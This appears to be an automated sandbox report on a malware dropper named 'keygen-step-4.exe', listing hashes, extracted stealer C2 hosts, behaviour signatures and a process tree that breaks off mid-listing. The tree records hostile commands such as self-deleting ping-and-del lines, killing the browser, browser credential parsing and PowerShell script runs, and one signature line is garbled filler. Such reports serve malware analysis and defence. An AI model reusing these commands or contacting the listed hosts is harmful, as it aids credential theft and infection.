Resubmissions

24-04-2021 06:39

210424-z9rcb7aepa 10

23-04-2021 19:10

210423-eqazybfbwe 10

23-04-2021 19:10

210423-11yc7me6fe 10

23-04-2021 18:20

210423-96m9f6fxjx 10

23-04-2021 13:38

210423-fv1qhsltzj 10

23-04-2021 13:38

210423-6hhapn6pdx 10

23-04-2021 13:38

210423-m5azl6mq1s 10

23-04-2021 13:38

210423-nlvbxenam6 10

23-04-2021 13:38

210423-y4rkc8l6ts 10

23-04-2021 05:23

210423-lejp16ex1n 10

Analysis

  • max time kernel
    43s
  • max time network
    212s
  • platform
    windows10_x64
  • resource
    win10v20210408
  • submitted
    22-04-2021 17:47

Errors

Reason
Machine shutdown

General

  • Target

    keygen-step-4.exe

  • Size

    4.6MB

  • MD5

    563107b1df2a00f4ec868acd9e08a205

  • SHA1

    9cb9c91d66292f5317aa50d92e38834861e9c9b7

  • SHA256

    bf2bd257dde4921ce83c7c1303fafe7f9f81e53c2775d3c373ced482b22eb8a9

  • SHA512

    99a8d247fa435c4cd95be7bc64c7dd6e382371f3a3c160aac3995fd705e4fd3f6622c23784a4ae3457c87536347d15eda3f08aa616450778a99376df540d74d1

Malware Config

Extracted

Family

redline

Botnet

бр23.04

C2

redworksite.info:80

Extracted

Family

fickerstealer

C2

sodaandcoke.top:80

Signatures

  • DcRat

    DarkCrystal(DC) is a new .NET RAT active since June 2019 capable of loading additional plugins.

  • ElysiumStealer

    ElysiumStealer (previously known as ZeromaxStealer) is an info stealer that can steal login credentials for various accounts.

  • RedLine

    RedLine Stealer is a malware family written in C#, first appearing in early 2020.

  • RedLine Payload 4 IoCs
  • Tofsee

    Backdoor/botnet which carries out malicious activities based on commands from a C2 server.

  • fickerstealer

    Ficker is an infostealer written in Rust and ASM.

  • rﱞﱞﱞﱞﱞﱞ ฺฺฺฺฺฺฺฺฺฺฺฺ ฺฺฺฺ ฺﱞﱞﱞﱞﱞﱞﱞﱞﱞﱞﱞﱞﱞﱞﱞﱞﱞﱞﱞﱞﱞﱞﱞﱞﱞﱞﱞﱞﱞﱞﱞﱞﱞﱞﱞﱞﱞﱞﱞﱞﱞﱞﱞﱞ ﱞﱞﱞﱞﱞﱞﱞﱞﱞﱞﱞﱞﱞﱞﱞﱞﱞﱞﱞﱞﱞﱞﱞﱞﱞﱞﱞﱞﱞﱞﱞﱞﱞﱞﱞﱞﱞﱞﱞﱞﱞﱞﱞﱞﱞﱞﱞﱞﱞﱞﱞﱞﱞﱞﱞﱞﱞﱞﱞﱞﱞﱞﱞﱞﱞﱞﱞﱞﱞﱞﱞﱞﱞﱞﱞﱞ ﱞﱞﱞﱞﱞﱞﱞﱞﱞﱞﱞﱞﱞﱞﱞﱞﱞﱞﱞﱞﱞﱞﱞﱞﱞﱞﱞﱞﱞﱞﱞﱞฺฺฺฺฺฺฺฺฺฺฺฺฺฺฺฺฺฺฺฺฺฺฺฺฺฺฺฺฺฺฺฺฺฺฺฺฺฺฺฺฺฺฺฺฺฺฺฺฺฺฺฺฺฺฺฺฺฺฺฺฺฺฺฺฺฺฺฺฺฺฺฺฺฺฺฺฺฺฺฺฺฺฺฺฺฺฺฺฺฺฺฺฺฺฺฺฺฺฺฺฺฺฺฺฺฺฺฺฺฺฺฺฺฺฺฺฺฺฺฺฺฺฺฺฺฺฺฺฺฺฺฺฺฺฺฺฺฺฺฺฺฺฺฺฺฺฺฺฺฺฺฺฺฺฺฺฺฺฺฺฺฺฺฺฺฺฺฺฺฺฺฺฺฺฺฺฺฺฺฺฺฺฺฺฺฺฺฺฺฺฺฺฺฺฺฺฺฺฺฺฺฺฺฺฺฺฺฺฺฺฺฺฺฺฺฺฺฺฺฺฺฺฺฺฺฺฺฺฺฺฺฺฺฺฺฺฺฺฺฺฺฺฺฺฺฺฺฺฺฺฺฺฺฺฺฺฺฺฺฺฺฺฺฺฺฺฺฺฺฺฺฺฺฺฺฺฺฺฺฺฺฺฺฺฺฺฺฺฺฺฺฺฺฺฺฺฺฺฺฺฺฺฺฺฺฺฺฺฺฺฺฺฺฺฺฺฺฺฺฺฺฺฺฺฺฺฺฺฺฺฺฺฺฺฺฺฺฺฺฺฺฺฺฺฺฺฺฺฺฺฺฺฺฺฺฺฺฺฺฺฺฺฺฺฺฺฺฺฺฺฺฺฺฺฺฺฺฺฺฺฺฺฺฺฺฺฺฺฺฺฺฺฺฺฺฺฺฺฺฺฺฺฺฺฺฺฺฺฺฺฺฺฺฺฺฺฺฺฺฺฺฺฺฺฺฺฺฺฺฺฺฺฺฺฺฺﱞﱞﱞﱞﱞﱞﱞﱞﱞﱞﱞﱞﱞ ﱞﱞﱞﱞﱞﱞﱞﱞﱞﱞﱞﱞﱞﱞﱞﱞﱞﱞﱞﱞﱞﱞﱞﱞﱞﱞﱞﱞﱞﱞﱞﱞﱞﱞﱞﱞﱞﱞﱞﱞﱞﱞﱞﱞﱞﱞﱞﱞﱞﱞﱞﱞﱞﱞﱞﱞﱞﱞﱞﱞ ﱞﱞﱞﱞﱞﱞﱞﱞﱞﱞﱞﱞﱞﱞﱞﱞﱞﱞﱞﱞﱞ ﱞﱞﱞﱞﱞﱞﱞﱞﱞﱞﱞﱞﱞﱞﱞﱞﱞﱞﱞﱞﱞﱞﱞﱞﱞﱞﱞﱞﱞﱞﱞﱞﱞﱞﱞﱞﱞﱞﱞﱞﱞﱞﱞﱞ ﱞﱞﱞﱞﱞﱞﱞﱞﱞﱞﱞﱞﱞﱞﱞﱞﱞﱞﱞﱞﱞﱞﱞﱞﱞﱞﱞﱞﱞﱞﱞﱞﱞﱞﱞﱞﱞﱞﱞﱞﱞﱞﱞﱞﱞﱞﱞﱞﱞﱞﱞﱞﱞﱞﱞﱞﱞﱞﱞﱞ ﱞﱞﱞﱞﱞﱞﱞﱞﱞﱞﱞﱞﱞﱞﱞﱞﱞﱞﱞﱞﱞ ﱞﱞﱞﱞﱞﱞﱞﱞﱞﱞﱞﱞﱞﱞﱞﱞﱞﱞﱞﱞﱞﱞﱞﱞﱞﱞﱞﱞﱞﱞﱞﱞﱞﱞﱞﱞﱞﱞﱞﱞﱞﱞﱞﱞ ﱞﱞﱞﱞﱞﱞﱞﱞﱞﱞﱞﱞﱞﱞﱞﱞﱞﱞﱞﱞﱞﱞﱞﱞﱞﱞﱞﱞﱞﱞﱞﱞﱞﱞﱞﱞﱞﱞﱞﱞﱞﱞﱞﱞﱞﱞﱞﱞﱞﱞﱞﱞﱞﱞﱞﱞﱞﱞﱞ ﱞﱞﱞﱞﱞﱞﱞﱞﱞﱞﱞﱞﱞﱞﱞﱞﱞﱞﱞﱞﱞ ﱞﱞﱞﱞﱞﱞﱞﱞﱞﱞﱞﱞﱞﱞﱞﱞﱞﱞﱞﱞﱞﱞﱞﱞﱞﱞﱞﱞﱞﱞﱞﱞﱞﱞﱞﱞﱞﱞﱞﱞﱞﱞﱞﱞ ﱞﱞﱞﱞﱞﱞﱞﱞﱞﱞﱞﱞﱞﱞﱞﱞﱞﱞﱞﱞﱞﱞﱞﱞﱞﱞﱞﱞﱞﱞﱞﱞﱞﱞﱞﱞﱞﱞﱞﱞﱞﱞﱞﱞﱞﱞﱞﱞﱞﱞﱞﱞﱞﱞﱞﱞﱞﱞﱞﱞ ﱞﱞﱞﱞﱞﱞﱞﱞﱞﱞﱞﱞﱞﱞﱞﱞﱞﱞﱞﱞﱞ ﱞﱞﱞﱞﱞﱞﱞﱞﱞﱞﱞﱞﱞﱞﱞﱞﱞﱞﱞﱞﱞﱞﱞﱞﱞﱞﱞﱞﱞﱞﱞﱞﱞﱞﱞﱞﱞﱞﱞﱞﱞﱞﱞﱞ ﱞﱞﱞﱞﱞﱞﱞﱞﱞﱞﱞﱞﱞﱞﱞﱞﱞﱞﱞﱞﱞﱞﱞﱞﱞﱞﱞﱞﱞﱞﱞﱞﱞﱞﱞﱞﱞﱞﱞﱞﱞﱞﱞﱞﱞﱞﱞﱞﱞﱞﱞﱞﱞﱞﱞﱞﱞﱞ ﱞﱞﱞﱞﱞﱞﱞﱞﱞﱞﱞﱞﱞﱞﱞﱞﱞﱞﱞﱞﱞ ﱞﱞﱞﱞﱞﱞﱞﱞﱞﱞﱞﱞﱞﱞﱞﱞﱞﱞﱞﱞﱞﱞﱞﱞﱞﱞﱞﱞﱞﱞﱞﱞﱞﱞﱞﱞﱞﱞﱞﱞﱞﱞﱞﱞ ﱞﱞﱞﱞﱞﱞﱞﱞﱞﱞﱞﱞﱞﱞﱞﱞﱞﱞﱞﱞﱞﱞﱞﱞﱞﱞﱞﱞﱞﱞﱞﱞﱞﱞﱞﱞﱞﱞﱞﱞﱞﱞﱞﱞﱞﱞﱞﱞﱞﱞﱞﱞﱞﱞﱞﱞﱞﱞ ﱞﱞﱞﱞﱞﱞﱞﱞﱞﱞﱞﱞﱞﱞﱞﱞﱞﱞﱞﱞﱞ ﱞﱞﱞﱞﱞﱞﱞﱞﱞﱞﱞﱞﱞﱞﱞﱞﱞﱞﱞﱞﱞﱞﱞﱞﱞﱞﱞﱞﱞﱞﱞﱞﱞﱞﱞﱞﱞﱞﱞﱞﱞﱞﱞﱞ ﱞﱞﱞﱞﱞﱞﱞﱞﱞﱞﱞﱞﱞﱞﱞﱞﱞﱞﱞﱞﱞﱞﱞﱞﱞﱞﱞﱞﱞﱞﱞﱞﱞﱞﱞﱞﱞﱞﱞﱞﱞﱞﱞﱞﱞﱞ ﱞﱞﱞﱞﱞﱞﱞﱞﱞﱞﱞﱞﱞﱞﱞﱞﱞﱞﱞﱞﱞ ﱞﱞﱞﱞﱞﱞﱞﱞﱞﱞﱞﱞﱞﱞﱞﱞﱞﱞﱞﱞﱞﱞﱞﱞﱞﱞﱞﱞﱞﱞﱞﱞﱞﱞﱞﱞﱞﱞﱞﱞﱞﱞﱞﱞ ﱞﱞﱞﱞﱞﱞﱞﱞﱞﱞﱞﱞﱞﱞﱞﱞredﱞﱞﱞﱞﱞﱞﱞﱞﱞﱞﱞﱞﱞﱞﱞﱞﱞﱞﱞﱞﱞﱞﱞﱞﱞﱞﱞﱞﱞﱞﱞﱞﱞﱞﱞﱞﱞﱞﱞﱞﱞﱞﱞﱞ ﱞﱞﱞﱞﱞﱞﱞﱞﱞﱞﱞﱞﱞﱞﱞﱞﱞﱞﱞﱞﱞ ﱞﱞﱞﱞﱞﱞﱞﱞﱞﱞﱞﱞﱞﱞﱞﱞﱞﱞﱞﱞﱞﱞﱞﱞﱞﱞﱞﱞﱞﱞﱞﱞﱞﱞﱞﱞﱞﱞﱞﱞﱞﱞﱞﱞ ﱞﱞﱞﱞﱞﱞﱞﱞﱞﱞﱞﱞﱞﱞﱞﱞٌٌٌٌٌٌٌٌٌٌٌٌٌٌٌٌٌٌٌٌّﱞﱞﱞﱞﱞﱞﱞﱞﱞﱞﱞﱞﱞﱞﱞﱞﱞﱞﱞﱞﱞﱞﱞﱞﱞﱞﱞﱞﱞﱞﱞﱞﱞﱞﱞﱞﱞﱞﱞﱞﱞﱞﱞ ﱞﱞﱞﱞﱞﱞﱞﱞﱞﱞﱞﱞﱞﱞﱞﱞﱞﱞﱞﱞﱞline 2 IoCs

    redline_Stealer.

  • xmrig

    XMRig is a high performance, open source, cross platform CPU/GPU miner.

  • Checks for common network interception software 1 TTPs

    Looks in the registry for tools like Wireshark or Fiddler commonly used to analyze network activity.

  • XMRig Miner Payload 1 IoCs
  • Creates new service(s) 1 TTPs
  • Downloads MZ/PE file
  • Drops file in Drivers directory 1 IoCs
  • Executes dropped EXE 17 IoCs
  • Modifies Windows Firewall 1 TTPs
  • Checks computer location settings 2 TTPs 1 IoCs

    Looks up country code configured in the registry, likely geofence.

  • Loads dropped DLL 3 IoCs
  • Reads user/profile data of web browsers 2 TTPs

    Infostealers often target stored browser data, which can include saved credentials etc.

  • Adds Run key to start application 2 TTPs 2 IoCs
  • Checks installed software on the system 1 TTPs

    Looks up Uninstall key entries in the registry to enumerate software on the system.

  • Legitimate hosting services abused for malware hosting/C2 1 TTPs
  • Looks up external IP address via web service 10 IoCs

    Uses a legitimate IP lookup service to find the infected system's external IP.

  • Drops file in System32 directory 3 IoCs
  • Suspicious use of SetThreadContext 1 IoCs
  • Drops file in Program Files directory 15 IoCs
  • Drops file in Windows directory 1 IoCs
  • Launches sc.exe

    Sc.exe is a Windows utlilty to control services on the system.

  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

  • Program crash 10 IoCs
  • Checks processor information in registry 2 TTPs 2 IoCs

    Processor information is often read in order to detect sandboxing environments.

  • Delays execution with timeout.exe 1 IoCs
  • Download via BitsAdmin 1 TTPs 1 IoCs
  • Kills process with taskkill 1 IoCs
  • Modifies Internet Explorer settings 1 TTPs 2 IoCs
  • Modifies data under HKEY_USERS 13 IoCs
  • Modifies registry class 64 IoCs
  • Runs ping.exe 1 TTPs 3 IoCs
  • Suspicious behavior: EnumeratesProcesses 64 IoCs
  • Suspicious use of AdjustPrivilegeToken 64 IoCs
  • Suspicious use of FindShellTrayWindow 1 IoCs
  • Suspicious use of SetWindowsHookEx 5 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs

Processes

  • c:\windows\system32\svchost.exe
    c:\windows\system32\svchost.exe -k netsvcs -s Winmgmt
    1⤵
    • Suspicious use of AdjustPrivilegeToken
    PID:2728
  • c:\windows\system32\svchost.exe
    c:\windows\system32\svchost.exe -k netsvcs -s WpnService
    1⤵
      PID:2720
    • c:\windows\system32\svchost.exe
      c:\windows\system32\svchost.exe -k netsvcs -s Browser
      1⤵
        PID:2712
      • c:\windows\system32\svchost.exe
        c:\windows\system32\svchost.exe -k netsvcs -s IKEEXT
        1⤵
          PID:2420
        • c:\windows\system32\svchost.exe
          c:\windows\system32\svchost.exe -k netsvcs -s LanmanServer
          1⤵
            PID:2400
          • c:\windows\system32\svchost.exe
            c:\windows\system32\svchost.exe -k netsvcs -s ShellHWDetection
            1⤵
              PID:1868
            • c:\windows\system32\svchost.exe
              c:\windows\system32\svchost.exe -k netsvcs -s UserManager
              1⤵
                PID:1408
              • c:\windows\system32\svchost.exe
                c:\windows\system32\svchost.exe -k netsvcs -s SENS
                1⤵
                  PID:1396
                • c:\windows\system32\svchost.exe
                  c:\windows\system32\svchost.exe -k netsvcs -s Themes
                  1⤵
                    PID:1176
                  • c:\windows\system32\svchost.exe
                    c:\windows\system32\svchost.exe -k netsvcs -s ProfSvc
                    1⤵
                      PID:1100
                    • c:\windows\system32\svchost.exe
                      c:\windows\system32\svchost.exe -k netsvcs -s Schedule
                      1⤵
                        PID:1036
                      • c:\windows\system32\svchost.exe
                        c:\windows\system32\svchost.exe -k netsvcs -s gpsvc
                        1⤵
                          PID:296
                        • C:\Users\Admin\AppData\Local\Temp\keygen-step-4.exe
                          "C:\Users\Admin\AppData\Local\Temp\keygen-step-4.exe"
                          1⤵
                          • Suspicious use of WriteProcessMemory
                          PID:472
                          • C:\Users\Admin\AppData\Local\Temp\RarSFX0\xiuhuali.exe
                            "C:\Users\Admin\AppData\Local\Temp\RarSFX0\xiuhuali.exe"
                            2⤵
                            • Executes dropped EXE
                            • Drops file in Program Files directory
                            • Suspicious use of SetWindowsHookEx
                            • Suspicious use of WriteProcessMemory
                            PID:800
                            • C:\Windows\SysWOW64\rundll32.exe
                              "C:\Windows\System32\rundll32.exe" "C:\Program Files\install.dll",install
                              3⤵
                              • Loads dropped DLL
                              • Modifies registry class
                              • Suspicious behavior: EnumeratesProcesses
                              • Suspicious use of AdjustPrivilegeToken
                              • Suspicious use of WriteProcessMemory
                              PID:2296
                          • C:\Users\Admin\AppData\Local\Temp\RarSFX0\JoSetp.exe
                            "C:\Users\Admin\AppData\Local\Temp\RarSFX0\JoSetp.exe"
                            2⤵
                            • Executes dropped EXE
                            • Suspicious use of AdjustPrivilegeToken
                            • Suspicious use of WriteProcessMemory
                            PID:1380
                            • C:\ProgramData\2232863.exe
                              "C:\ProgramData\2232863.exe"
                              3⤵
                              • Executes dropped EXE
                              • Suspicious behavior: EnumeratesProcesses
                              • Suspicious use of AdjustPrivilegeToken
                              PID:492
                            • C:\ProgramData\6357858.exe
                              "C:\ProgramData\6357858.exe"
                              3⤵
                              • Executes dropped EXE
                              • Adds Run key to start application
                              • Suspicious use of WriteProcessMemory
                              PID:2160
                              • C:\ProgramData\Windows Host\Windows Host.exe
                                "C:\ProgramData\Windows Host\Windows Host.exe"
                                4⤵
                                • Executes dropped EXE
                                PID:2836
                          • C:\Users\Admin\AppData\Local\Temp\RarSFX0\Install.exe
                            "C:\Users\Admin\AppData\Local\Temp\RarSFX0\Install.exe"
                            2⤵
                            • Executes dropped EXE
                            • Suspicious use of WriteProcessMemory
                            PID:2880
                            • C:\Users\Admin\AppData\Local\Temp\is-G3ICS.tmp\Install.tmp
                              "C:\Users\Admin\AppData\Local\Temp\is-G3ICS.tmp\Install.tmp" /SL5="$6007A,235791,152064,C:\Users\Admin\AppData\Local\Temp\RarSFX0\Install.exe"
                              3⤵
                              • Executes dropped EXE
                              • Loads dropped DLL
                              • Suspicious use of WriteProcessMemory
                              PID:1672
                              • C:\Users\Admin\AppData\Local\Temp\is-5A7A8.tmp\Ultra.exe
                                "C:\Users\Admin\AppData\Local\Temp\is-5A7A8.tmp\Ultra.exe" /S /UID=burnerch1
                                4⤵
                                • Drops file in Drivers directory
                                • Executes dropped EXE
                                • Adds Run key to start application
                                • Drops file in Program Files directory
                                • Suspicious use of WriteProcessMemory
                                PID:632
                                • C:\Program Files\Windows Sidebar\CNELRCUCGA\ultramediaburner.exe
                                  "C:\Program Files\Windows Sidebar\CNELRCUCGA\ultramediaburner.exe" /VERYSILENT
                                  5⤵
                                  • Executes dropped EXE
                                  • Suspicious use of WriteProcessMemory
                                  PID:4188
                                  • C:\Users\Admin\AppData\Local\Temp\is-E0PDQ.tmp\ultramediaburner.tmp
                                    "C:\Users\Admin\AppData\Local\Temp\is-E0PDQ.tmp\ultramediaburner.tmp" /SL5="$5015A,281924,62464,C:\Program Files\Windows Sidebar\CNELRCUCGA\ultramediaburner.exe" /VERYSILENT
                                    6⤵
                                    • Executes dropped EXE
                                    • Drops file in Program Files directory
                                    • Suspicious behavior: EnumeratesProcesses
                                    • Suspicious use of FindShellTrayWindow
                                    • Suspicious use of WriteProcessMemory
                                    PID:4224
                                    • C:\Program Files (x86)\UltraMediaBurner\UltraMediaBurner.exe
                                      "C:\Program Files (x86)\UltraMediaBurner\UltraMediaBurner.exe" -silent -desktopShortcut -programMenu
                                      7⤵
                                      • Executes dropped EXE
                                      PID:4320
                                • C:\Users\Admin\AppData\Local\Temp\2d-89c9a-e17-a5e81-537d6c33aa3a8\Pecipaegoru.exe
                                  "C:\Users\Admin\AppData\Local\Temp\2d-89c9a-e17-a5e81-537d6c33aa3a8\Pecipaegoru.exe"
                                  5⤵
                                  • Executes dropped EXE
                                  • Checks computer location settings
                                  PID:4248
                                • C:\Users\Admin\AppData\Local\Temp\33-ab0e0-a2f-7d987-0bd582c42b1f8\Lelaedaecene.exe
                                  "C:\Users\Admin\AppData\Local\Temp\33-ab0e0-a2f-7d987-0bd582c42b1f8\Lelaedaecene.exe"
                                  5⤵
                                  • Executes dropped EXE
                                  • Suspicious behavior: EnumeratesProcesses
                                  • Suspicious use of WriteProcessMemory
                                  PID:4308
                                  • C:\Windows\System32\cmd.exe
                                    "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\bzfqov0c.2ni\instEU.exe & exit
                                    6⤵
                                    • Suspicious use of WriteProcessMemory
                                    PID:4808
                                    • C:\Users\Admin\AppData\Local\Temp\bzfqov0c.2ni\instEU.exe
                                      C:\Users\Admin\AppData\Local\Temp\bzfqov0c.2ni\instEU.exe
                                      7⤵
                                      • Executes dropped EXE
                                      PID:5604
                                  • C:\Windows\System32\cmd.exe
                                    "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\beaxocl4.s3l\gpooe.exe & exit
                                    6⤵
                                      PID:5624
                                    • C:\Windows\System32\cmd.exe
                                      "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\arkn33kx.01x\google-game.exe & exit
                                      6⤵
                                        PID:4832
                                        • C:\Users\Admin\AppData\Local\Temp\arkn33kx.01x\google-game.exe
                                          C:\Users\Admin\AppData\Local\Temp\arkn33kx.01x\google-game.exe
                                          7⤵
                                          • Executes dropped EXE
                                          • Drops file in Program Files directory
                                          • Suspicious use of SetWindowsHookEx
                                          PID:5124
                                          • C:\Windows\SysWOW64\rundll32.exe
                                            "C:\Windows\System32\rundll32.exe" "C:\Program Files\install.dll",install
                                            8⤵
                                            • Loads dropped DLL
                                            • Modifies registry class
                                            PID:5220
                                      • C:\Windows\System32\cmd.exe
                                        "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\wxwn4ole.nr3\skipper.exe /s & exit
                                        6⤵
                                          PID:5464
                                          • C:\Users\Admin\AppData\Local\Temp\wxwn4ole.nr3\skipper.exe
                                            C:\Users\Admin\AppData\Local\Temp\wxwn4ole.nr3\skipper.exe /s
                                            7⤵
                                            • Executes dropped EXE
                                            PID:4896
                                            • C:\Users\Admin\AppData\Local\Temp\1739231965.exe
                                              C:\Users\Admin\AppData\Local\Temp\1739231965.exe
                                              8⤵
                                                PID:4172
                                                • C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe
                                                  C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe
                                                  9⤵
                                                    PID:3232
                                                  • C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe
                                                    C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe
                                                    9⤵
                                                      PID:4452
                                                  • C:\Users\Admin\AppData\Local\Temp\464245967.exe
                                                    C:\Users\Admin\AppData\Local\Temp\464245967.exe
                                                    8⤵
                                                      PID:4480
                                                    • C:\Windows\SysWOW64\cmd.exe
                                                      "C:\Windows\system32\cmd.exe" /k ping 0 & del C:\Users\Admin\AppData\Local\Temp\wxwn4ole.nr3\skipper.exe & exit
                                                      8⤵
                                                        PID:5132
                                                        • C:\Windows\SysWOW64\PING.EXE
                                                          ping 0
                                                          9⤵
                                                          • Runs ping.exe
                                                          PID:4592
                                                  • C:\Windows\System32\cmd.exe
                                                    "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\vedvvqeg.dfj\md1_1eaf.exe & exit
                                                    6⤵
                                                      PID:5144
                                                      • C:\Users\Admin\AppData\Local\Temp\vedvvqeg.dfj\md1_1eaf.exe
                                                        C:\Users\Admin\AppData\Local\Temp\vedvvqeg.dfj\md1_1eaf.exe
                                                        7⤵
                                                          PID:5644
                                                      • C:\Windows\System32\cmd.exe
                                                        "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\xbv2yksg.i0a\askinstall36.exe & exit
                                                        6⤵
                                                          PID:5040
                                                          • C:\Users\Admin\AppData\Local\Temp\xbv2yksg.i0a\askinstall36.exe
                                                            C:\Users\Admin\AppData\Local\Temp\xbv2yksg.i0a\askinstall36.exe
                                                            7⤵
                                                              PID:4632
                                                              • C:\Windows\SysWOW64\cmd.exe
                                                                cmd.exe /c taskkill /f /im chrome.exe
                                                                8⤵
                                                                  PID:364
                                                                  • C:\Windows\SysWOW64\taskkill.exe
                                                                    taskkill /f /im chrome.exe
                                                                    9⤵
                                                                    • Kills process with taskkill
                                                                    PID:6036
                                                            • C:\Windows\System32\cmd.exe
                                                              "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\5xg30tkw.hea\KQLFMTXYBL.exe & exit
                                                              6⤵
                                                                PID:492
                                                                • C:\Users\Admin\AppData\Local\Temp\5xg30tkw.hea\KQLFMTXYBL.exe
                                                                  C:\Users\Admin\AppData\Local\Temp\5xg30tkw.hea\KQLFMTXYBL.exe
                                                                  7⤵
                                                                    PID:4760
                                                                    • C:\Users\Admin\AppData\Local\Temp\RarSFX1\main.exe
                                                                      "C:\Users\Admin\AppData\Local\Temp\RarSFX1\main.exe"
                                                                      8⤵
                                                                        PID:6120
                                                                        • C:\Users\Admin\AppData\Local\Temp\RarSFX1\parse.exe
                                                                          parse.exe -f json -b firefox
                                                                          9⤵
                                                                            PID:5936
                                                                          • C:\Users\Admin\AppData\Local\Temp\RarSFX1\parse.exe
                                                                            parse.exe -f json -b chrome
                                                                            9⤵
                                                                              PID:4892
                                                                            • C:\Users\Admin\AppData\Local\Temp\RarSFX1\parse.exe
                                                                              parse.exe -f json -b edge
                                                                              9⤵
                                                                                PID:5576
                                                                        • C:\Windows\System32\cmd.exe
                                                                          "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\4i2l1f50.psp\y1.exe & exit
                                                                          6⤵
                                                                            PID:5660
                                                                            • C:\Users\Admin\AppData\Local\Temp\4i2l1f50.psp\y1.exe
                                                                              C:\Users\Admin\AppData\Local\Temp\4i2l1f50.psp\y1.exe
                                                                              7⤵
                                                                                PID:4800
                                                                                • C:\Users\Admin\AppData\Local\Temp\e4hHEKAQiA.exe
                                                                                  "C:\Users\Admin\AppData\Local\Temp\e4hHEKAQiA.exe"
                                                                                  8⤵
                                                                                    PID:5244
                                                                                    • C:\Users\Admin\AppData\Roaming\1619120979120.exe
                                                                                      "C:\Users\Admin\AppData\Roaming\1619120979120.exe" /sjson "C:\Users\Admin\AppData\Roaming\1619120979120.txt"
                                                                                      9⤵
                                                                                        PID:4240
                                                                                      • C:\Windows\SysWOW64\cmd.exe
                                                                                        cmd /c ping 127.0.0.1 -n 3 & del "C:\Users\Admin\AppData\Local\Temp\e4hHEKAQiA.exe"
                                                                                        9⤵
                                                                                          PID:5528
                                                                                          • C:\Windows\SysWOW64\PING.EXE
                                                                                            ping 127.0.0.1 -n 3
                                                                                            10⤵
                                                                                            • Modifies registry class
                                                                                            • Runs ping.exe
                                                                                            PID:5000
                                                                                      • C:\Windows\SysWOW64\cmd.exe
                                                                                        cmd.exe /C timeout /T 10 /NOBREAK > Nul & Del /f /q "C:\Users\Admin\AppData\Local\Temp\4i2l1f50.psp\y1.exe"
                                                                                        8⤵
                                                                                          PID:796
                                                                                          • C:\Windows\SysWOW64\timeout.exe
                                                                                            timeout /T 10 /NOBREAK
                                                                                            9⤵
                                                                                            • Delays execution with timeout.exe
                                                                                            PID:6128
                                                                                    • C:\Windows\System32\cmd.exe
                                                                                      "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\1tjtoism.hyw\ABCbrowser.exe /VERYSILENT & exit
                                                                                      6⤵
                                                                                        PID:4816
                                                                                        • C:\Users\Admin\AppData\Local\Temp\1tjtoism.hyw\ABCbrowser.exe
                                                                                          C:\Users\Admin\AppData\Local\Temp\1tjtoism.hyw\ABCbrowser.exe /VERYSILENT
                                                                                          7⤵
                                                                                            PID:5244
                                                                                            • C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe
                                                                                              C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe
                                                                                              8⤵
                                                                                                PID:5628
                                                                                              • C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe
                                                                                                C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe
                                                                                                8⤵
                                                                                                  PID:1304
                                                                                            • C:\Windows\System32\cmd.exe
                                                                                              "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\dpvjsoo0.uwg\toolspab1.exe & exit
                                                                                              6⤵
                                                                                                PID:3188
                                                                                                • C:\Users\Admin\AppData\Local\Temp\dpvjsoo0.uwg\toolspab1.exe
                                                                                                  C:\Users\Admin\AppData\Local\Temp\dpvjsoo0.uwg\toolspab1.exe
                                                                                                  7⤵
                                                                                                    PID:5440
                                                                                                    • C:\Users\Admin\AppData\Local\Temp\dpvjsoo0.uwg\toolspab1.exe
                                                                                                      C:\Users\Admin\AppData\Local\Temp\dpvjsoo0.uwg\toolspab1.exe
                                                                                                      8⤵
                                                                                                        PID:5340
                                                                                                  • C:\Windows\System32\cmd.exe
                                                                                                    "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\wpmdz5yk.vcp\SunLabsPlayer.exe /S & exit
                                                                                                    6⤵
                                                                                                      PID:1424
                                                                                                      • C:\Users\Admin\AppData\Local\Temp\wpmdz5yk.vcp\SunLabsPlayer.exe
                                                                                                        C:\Users\Admin\AppData\Local\Temp\wpmdz5yk.vcp\SunLabsPlayer.exe /S
                                                                                                        7⤵
                                                                                                          PID:664
                                                                                                          • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                            powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsxBDB5.tmp\tempfile.ps1"
                                                                                                            8⤵
                                                                                                              PID:6036
                                                                                                            • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                              powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsxBDB5.tmp\tempfile.ps1"
                                                                                                              8⤵
                                                                                                                PID:4716
                                                                                                              • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsxBDB5.tmp\tempfile.ps1"
                                                                                                                8⤵
                                                                                                                  PID:4480
                                                                                                                • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                  powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsxBDB5.tmp\tempfile.ps1"
